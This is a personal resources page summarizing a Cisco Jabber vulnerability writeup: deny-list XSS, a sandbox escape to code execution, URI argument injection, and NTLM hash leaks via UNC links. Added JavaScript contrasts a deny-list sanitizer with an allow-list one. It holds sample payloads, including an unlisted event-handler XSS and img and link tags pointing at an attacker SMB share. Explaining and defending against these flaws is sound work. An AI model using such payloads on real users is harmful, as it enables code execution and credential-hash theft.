Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Cisco Jabber Vulnerabilities Lead to RCE - 246

WatchCOM, posted 5 years ago
  • Cisco Jabber is a video conferencing and instant messaging application used at many businesses. It is built on the Chromium Embedded Framework (CEF), which lets the application embed a Chromium browser to render its UI.
  • The first vulnerability is a classic XSS bug. Messages may carry custom-styled HTML, and the application filtered them with a deny list of dangerous attributes. The list was not comprehensive, so an attribute missing from it was enough to get attacker-controlled script running in the embedded browser.
  • The CEF renderer is sandboxed, but a way out of the sandbox was found: a function called CallCppFunction, exposed to the page, launches an arbitrary executable on the system. Chaining that with the built-in file transfer feature (to deliver the executable), the XSS becomes arbitrary code execution on the victim's machine.
  • Several of the application's custom URI handlers were also vulnerable. The protocol handler did not account for spaces in the URI, so an attacker could inject additional command-line arguments into the binary the handler launches, which is another route to RCE.
  • The next bug was that SMB links (UNC paths of the form \\server\share) were clickable within the application. This is very bad: following one makes Windows authenticate to the attacker's server, leaking the user's NTLM hash, which can be cracked offline to recover the password. The same leak can also be triggered without any click by putting the link in an img tag instead of a clickable link, since the client fetches the image automatically when the message renders.
  • Overall, several really good vulnerability classes here that demonstrate the importance of good desktop application security.
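As an added example (not code from the WatchCom writeup or from Cisco Jabber), here is the contrast between the deny-list attribute filter described in the XSS bullet and an allow-list filter that also refuses the UNC and file: URLs behind the NTLM leak. The deny list contents, the tag/attribute allow list, the function names, the choice of an unlisted event-handler attribute and the sample chat messages are all assumptions constructed for illustration:

```javascript
// Added example, not code from the writeup or from Cisco Jabber. Constructed
// chat messages (assumptions for illustration) are run through a deny-list
// attribute filter and an allow-list filter so the difference is visible.

// Hypothetical deny list: a handful of event handlers, but far from all of them.
const DENIED_ATTRS = new Set(['onclick', 'onload', 'onerror', 'onmouseover', 'onfocus']);

// Allow list: the only tags, and per tag the only attributes, a message may carry.
// A Map (not a plain object) so a tag named "constructor" cannot hit the prototype.
const ALLOWED = new Map([
  ['b', new Set()], ['i', new Set()], ['br', new Set()], ['p', new Set()],
  ['span', new Set(['style'])],
  ['a', new Set(['href'])],
  ['img', new Set(['src', 'alt'])],
]);
// Attributes whose value is fetched or followed, so the value must be an http(s) URL.
const URL_ATTRS = new Set(['href', 'src']);

const TAG_RE = /<\s*(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*?)\s*(\/?)>/g;
const ATTR_RE = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>`]+)))?/g;

// Split a tag's raw attribute text into {name, value} pairs (names lower-cased).
function parseAttrs(raw) {
  const attrs = [];
  for (const m of raw.matchAll(ATTR_RE)) {
    attrs.push({ name: m[1].toLowerCase(), value: m[2] ?? m[3] ?? m[4] ?? '' });
  }
  return attrs;
}

// Only absolute http(s) URLs pass. UNC paths (\\host\share), protocol-relative
// //host forms, file: and smb: all fail, so no message can make the client open
// an outbound SMB connection and hand over an NTLM response.
function isSafeUrl(value) {
  const v = value.trim();
  if (v.startsWith('\\\\') || v.startsWith('//')) return false;
  try {
    const u = new URL(v);
    return u.protocol === 'http:' || u.protocol === 'https:';
  } catch {
    return false;
  }
}

function serialize(closing, name, attrs, selfClosing) {
  if (closing) return `</${name}>`;
  const a = attrs.map(({ name: n, value }) => ` ${n}="${value.replace(/"/g, '&quot;')}"`).join('');
  return `<${name}${a}${selfClosing ? ' /' : ''}>`;
}

// The vulnerable shape: strip what is on the list, keep everything else.
function denyListSanitize(html) {
  return html.replace(TAG_RE, (_, closing, name, rawAttrs, selfClosing) => {
    const attrs = parseAttrs(rawAttrs).filter((a) => !DENIED_ATTRS.has(a.name));
    return serialize(closing, name.toLowerCase(), attrs, selfClosing);
  });
}

// The hardened shape: keep only what is on the list and validate URL-bearing
// attributes. Unknown tags are dropped (their text content survives) and an
// <img> whose src fails validation is removed outright.
function allowListSanitize(html) {
  return html.replace(TAG_RE, (_, closing, rawName, rawAttrs, selfClosing) => {
    const name = rawName.toLowerCase();
    const allowedAttrs = ALLOWED.get(name);
    if (!allowedAttrs) return '';
    if (closing) return `</${name}>`;
    const attrs = parseAttrs(rawAttrs).filter(
      (a) => allowedAttrs.has(a.name) && (!URL_ATTRS.has(a.name) || isSafeUrl(a.value))
    );
    if (name === 'img' && !attrs.some((a) => a.name === 'src')) return '';
    return serialize(false, name, attrs, selfClosing);
  });
}

// Constructed sample messages (assumptions, not taken from the writeup).
const SAMPLES = {
  // An event-handler attribute the deny list happens to omit.
  xss: '<span style="color:red" onanimationstart="alert(1)">hi</span>',
  // Zero-click NTLM leak: the client fetches the image from a UNC path.
  smbImg: '<img src="\\\\attacker\\share\\pixel.png" alt="x">',
  // Clickable SMB link.
  smbLink: '<a href="\\\\attacker\\share\\doc.txt">open</a>',
  benign: '<a href="https://example.com/">site</a>',
};

for (const [label, msg] of Object.entries(SAMPLES)) {
  console.log(`${label}\n  deny-list : ${denyListSanitize(msg)}\n  allow-list: ${allowListSanitize(msg)}`);
}
```

The allow-list version never has to know which event-handler attribute the attacker picks, because anything not explicitly permitted is dropped; and because URL checking is done per attribute rather than per tag, an `<img src>` pointing at a share is caught just like a clickable link.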